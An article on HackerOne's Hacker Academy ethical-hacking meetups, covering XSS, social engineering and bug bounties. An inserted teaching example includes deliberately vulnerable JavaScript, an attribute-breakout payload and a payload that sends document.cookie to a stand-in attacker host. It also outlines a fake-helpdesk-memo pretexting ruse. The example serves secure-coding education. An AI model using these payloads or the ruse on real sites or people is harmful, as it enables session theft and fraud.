Hacker Academy is a meetup for anyone interested in what white-hat hackers do, how to become one, and for developers who want to write more secure web applications. HackerOne software engineers Ivan Malykh and Philip Kocanda introduce people of all skill levels to the world of ethical hacking and point out the importance of internet security. During Google’s Digital X event last month, Hacker Academy was part of the side program, with a series of workshops. “We had our first meetup in May”, Ivan says. “Hacking is something you can learn on your own, but it’s much more fun in a group of like-minded people, and of course you can also get extra help.”
Last month’s workshops featured an interactive beginner session in which attendees learned about Cross-Site Scripting (XSS), a basic web-hacking technique. A few weeks ago, HackerOne published its 28-page 2017 Hacker-Powered Security report, and XSS tops the list at 26 percent of reported vulnerabilities. Suffice it to say, it’s a pretty big issue.
So what is it exactly? “Simply put, it’s injecting a string of code into a website”, Ivan explains. “We’ve all filled out web forms, where you can enter your name or other information. Instead of filling in your name, you can also fill in a piece of code and take over parts of the website. A hacker would then be able to see sensitive user information like passwords or account information, and sometimes even turn on the camera. If you don’t regularly update your web browser, you’re very vulnerable to those attacks.”
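To make the form-field scenario Ivan describes concrete, here is an added example (it is not code from the article, the workshop, or HackerOne) of a reflected XSS bug beside its fix. The function names, the sample payloads and the attacker.example host are all illustrative.

```javascript
// Added illustration, not code from the article or from HackerOne.
// A page echoes the "name" field of a web form back into the HTML it serves.
// Function names, payloads and the attacker.example host are hypothetical.

// Vulnerable: untrusted input is concatenated straight into the HTML body,
// so a <script> tag typed into the form field runs in every visitor's browser.
function greetUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Vulnerable in a second context: the same input lands inside a quoted
// attribute, so the payload only needs a double quote to break out of the
// value and add an inline event handler.
function prefillUnsafe(name) {
  return `<input name="name" value="${name}">`;
}

// Fix: encode the five characters that can change HTML structure. This covers
// HTML text and double-quoted attribute values; JavaScript, URL and CSS
// contexts need their own encoders and are out of scope here.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function greetSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

function prefillSafe(name) {
  return `<input name="name" value="${escapeHtml(name)}">`;
}

// Crude check for the body-context case only: did a real <script> tag reach
// the output? Regexes cannot parse HTML in general, so the attribute case is
// judged by looking at the exact output instead.
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample payloads, the sort of thing typed into the "name" field.
// The first sends the visitor's cookie to the attacker; the second closes the
// attribute value and attaches an onfocus handler that fires at once because
// of autofocus.
const BODY_PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
const ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)';

// Stand-alone demo: compare the vulnerable and the escaped output side by side.
console.log('unsafe body:', greetUnsafe(BODY_PAYLOAD));
console.log('safe body:  ', greetSafe(BODY_PAYLOAD));
console.log('unsafe attr:', prefillUnsafe(ATTR_PAYLOAD));
console.log('safe attr:  ', prefillSafe(ATTR_PAYLOAD));
```

The point of the two contexts is that the same input needs the same encoder in both, applied at output time rather than on the way into the database, and that a field which is harmless in one place can be exploitable in another. Escaping removes the injection; marking session cookies HttpOnly and setting a Content Security Policy limit what a payload can do if one slips through.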
Hacking is all about finding vulnerabilities. But it’s not just about the software or the system; it’s also about the people using it. “We call that social engineering, which is a lot like phishing”, Ivan explains. “We tend to leave security up to the IT people, so the rest of the employees can concentrate on their own work. But when employees are not aware of those dangers or not adequately trained, that’s a major risk, because it only takes one employee to fall for it.”
Social engineering can be as simple as sending a phishing mail and hoping someone will take the bait, but it can also be more elaborate. A hacker could, for example, casually walk into an office building and post a memo on the bulletin board saying the phone number of the IT helpdesk has changed. “Employees have no reason not to trust a simple memo on a bulletin board”, Ivan says.
So what’s to stop people from using the skills they learn at the Hacker Academy meetups? “We highly encourage that, because that’s exactly what our HackerOne platform is for!” Ivan says with a smile. “If you want to make money as a hacker, you can, because it’s perfectly legal through our platform and you don’t have to worry about the consequences of getting caught.”
“I think a lot of people have the wrong idea about what hacking really is”, Ivan continues. “And that’s one of the reasons we’re organizing these meetups. By learning to hack, you also learn just how easy it is to be hacked. There’s nothing wrong with learning about security, and hacking itself is also a lot of fun.”
A lot of big companies like Twitter, Dropbox and General Motors use the HackerOne platform, and even the US Department of Defense offers bounties for finding security leaks. “But not a lot of Dutch and European companies use it though”, Ivan says. “I guess it’s still somewhat of a taboo here to use or pay hackers. I’m hoping that’ll change soon though, because a lot of companies don’t realize just how vulnerable they are.”
The next meetup will be somewhere in late August or early September. In the meantime, if you want to learn a little bit more about hacking, HackerOne is very open about resolved vulnerability reports and publishes them on its Hacktivity page.